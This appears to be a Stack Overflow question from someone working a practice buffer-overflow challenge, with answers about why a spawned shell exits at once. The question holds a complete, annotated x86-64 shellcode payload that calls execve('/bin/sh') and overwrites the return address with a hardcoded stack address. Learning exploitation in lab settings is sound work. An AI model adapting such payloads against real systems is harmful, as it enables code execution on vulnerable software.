# Shellcode successfully executes /bin/sh but immediately terminates

Tags: buffer-overflow, shellcode

I'm trying to solve a very simple exploiting challenge as exercise.
It is about injecting shellcode via buffer overflow, there is no ASLR and the stack is executable.

The payload I send is the following:

```
'\x00xx//bin/sh\x00H\xc7\xc0;\x00\x00\x00H\xbf\xb4\xdf\xff\xff\xff\x7f\x00
\x00H\xc7\xc6\x00\x00\x00\x00H\xc7\xc2\x00\x00
\x00\x00\x0f\x05aabbbbbbbbbbbbbbbbbbbbbbbbb\xbc\xdf\xff\xff\xff\x7f\x00\x00'
```

where

```
'\x00xx #Three bytes used to prevent the program to overwrite my payload
//bin/sh\x00 #Null terminated /bin/sh
H\xc7\xc0;\x00\x00\x00H\xbf\xb4\xdf\xff\xff\xff\x7f\x00\x00H\xc7\xc6
\x00
\x00\x00\x00H\xc7\xc2\x00\x00\x00\x00\x0f\x05 #This is equivalent to

 mov rax, 0x3b; #Syscall number for execve()
 mov rdi, 0x7fffffffdfb4; #First parameter, address of /bin/sh in stack
 mov rsi, 0x0; #Second parameter 0
 mov rdx, 0; #Third parameter 0
 syscall;

aabbbbbbbbbbbbbbbbbbbbbbbbb #Fill the remaining bytes of the buffer
\xbc\xdf\xff\xff\xff\x7f\x00\x00' #Overwrite the return address 
with the address of the first shellcode instruction.
```

Now this is the output if I execute the program in gdb

```
$ gdb exploit_me
gdb> r < payload
Starting program: /root/exploit_me < payload

[...]

process 7640 is executing new program: /bin/dash
[Inferior 1 (process 7640) exited normally]
```

This suggests that /bin/dash is correctly called, but then it terminates immediately.
Why does this happen?

Comment: Does this answer your question? [gdb exiting instead of spawning a shell](https://stackoverflow.com/questions/30972544/gdb-exiting-instead-of-spawning-a-shell)

Answer (score 0):

Please refer to [execve("/bin/sh", 0, 0); in a pipe](https://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe), it explains why `sh` closed prematurely because there is no stdin hence "no" TTY.

Answer (score -1):

There is no problem with the shellcode. See this video how to solve the problem [First Exploit! Buffer Overflow with Shellcode - bin 0x0E](https://youtu.be/HSlhY4Uy8SA?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&t=622)

Comment: Link only answer. Please include info from the video, in case the video is deleted.

Comment: i still dont fully understand how it works so i cannot write an explanation

Comment: The part of the video that answers the question starts at around 10:00. Here's a written explanation/answer - https://stackoverflow.com/questions/30972544/gdb-exiting-instead-of-spawning-a-shell